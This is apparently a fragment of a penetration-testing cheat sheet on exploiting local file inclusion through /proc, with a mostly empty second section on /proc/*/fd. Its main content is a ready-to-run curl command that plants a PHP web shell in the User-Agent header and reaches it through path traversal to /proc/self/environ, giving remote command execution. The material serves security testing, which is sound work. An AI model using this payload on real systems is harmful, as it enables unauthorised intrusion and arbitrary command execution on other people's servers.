/proc

::: details /proc/self/environ
Testers can abuse a process created due to a request. The payload is injected in the User-Agent header.

# Sending a request to $URL with a malicious user-agent
# Accessing the payload via LFI
curl --user-agent "<?php passthru($_GET['cmd']); ?>" $URL/?parameter=../../../proc/self/environ

:::

::: details πŸ› οΈ /proc/*/fd

:::